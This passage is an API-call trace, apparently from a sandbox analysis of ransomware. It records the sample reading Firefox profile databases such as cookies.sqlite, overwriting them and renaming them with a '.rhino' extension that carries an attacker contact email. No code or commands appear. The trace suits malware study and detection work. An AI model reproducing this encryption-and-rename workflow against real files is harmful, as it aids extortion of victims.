[0093.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.234] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0093.300] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x38000 [0093.301] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x38120, nNumberOfBytesToLockHigh=0x0) returned 1 [0093.301] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.301] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0093.303] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.304] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x38000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x38000, lpOverlapped=0x0) returned 1 [0093.307] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0093.307] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.307] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0093.307] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0093.307] GetLastError () returned 0x0 [0093.307] SetLastError (dwErrCode=0x0) [0093.307] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.307] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x38023) returned 0x23b0048 [0093.316] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.316] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0093.316] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0093.316] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.316] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.316] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0093.316] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0093.316] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.316] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0093.316] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0093.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75ef78 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f208 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f350 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f538 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f350 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f808 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f538 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75fc40 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f808 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f208 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc40 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75fb70 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760988 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb70 | out: hHeap=0x6d0000) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x761ec8 [0093.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760988 | out: hHeap=0x6d0000) returned 1 [0093.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763e90 [0093.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761ec8 | out: hHeap=0x6d0000) returned 1 [0093.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x75f208 [0093.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763e90 | out: hHeap=0x6d0000) returned 1 [0093.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x763958 [0093.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x72bfe8 [0093.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763958 | out: hHeap=0x6d0000) returned 1 [0093.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0093.319] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0093.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0093.320] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0093.320] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x781f78 [0093.344] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0093.345] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x32a39) returned 0x24b0048 [0093.351] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0093.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4bf44) returned 0x23e8078 [0093.359] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0093.360] WriteFile (in: hFile=0x104, lpBuffer=0x23e8080*, nNumberOfBytesToWrite=0x38120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23e8080*, lpNumberOfBytesWritten=0x2cfa04*=0x38120, lpOverlapped=0x0) returned 1 [0093.363] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23e8078 | out: hHeap=0x6d0000) returned 1 [0093.363] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x38120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0093.363] CloseHandle (hObject=0x104) returned 1 [0093.366] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0093.366] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x75f208 [0093.366] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0093.366] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0093.380] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.380] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0093.380] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0093.470] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0093.470] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0093.470] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0093.471] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x23b0048 [0093.471] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0093.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.471] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0093.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0093.471] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x80000 [0093.472] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x80120, nNumberOfBytesToLockHigh=0x0) returned 1 [0093.472] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.472] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0093.474] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.474] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x80000, lpOverlapped=0x0) returned 1 [0093.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0093.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0093.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0093.641] GetLastError () returned 0x0 [0093.641] SetLastError (dwErrCode=0x0) [0093.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80023) returned 0x120020 [0093.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0093.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0150 [0093.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0093.677] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0093.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0093.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0093.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0093.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0093.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0048 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b02d8 [0093.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0093.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0420 [0093.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0093.679] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0608 [0093.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0420 | out: hHeap=0x6d0000) returned 1 [0093.679] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b08d8 [0093.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0608 | out: hHeap=0x6d0000) returned 1 [0093.679] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75ef78 [0093.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b08d8 | out: hHeap=0x6d0000) returned 1 [0093.679] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b02d8 [0093.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.679] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0093.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0093.679] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75fd90 [0093.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.679] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7612d0 [0093.680] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fd90 | out: hHeap=0x6d0000) returned 1 [0093.680] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763298 [0093.680] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7612d0 | out: hHeap=0x6d0000) returned 1 [0093.680] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x766230 [0094.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763298 | out: hHeap=0x6d0000) returned 1 [0094.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75ef78 [0094.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x766230 | out: hHeap=0x6d0000) returned 1 [0094.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0094.012] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0094.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0094.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0094.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0094.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x781f78 [0094.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0094.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x32a39) returned 0x24b0048 [0094.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0094.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4bf44) returned 0x23b02d8 [0094.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0094.039] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x71ed4) returned 0x24b0048 [0094.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0094.112] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xaae2c) returned 0x26b0020 [0094.457] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x80120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0094.457] CloseHandle (hObject=0x104) returned 1 [0094.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0094.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75ef78 [0094.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0094.457] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0094.458] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.458] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0150 | out: hHeap=0x6d0000) returned 1 [0094.458] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x120020 | out: hHeap=0x6d0000) returned 1 [0094.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0094.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0094.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0094.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0094.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0094.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.465] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: 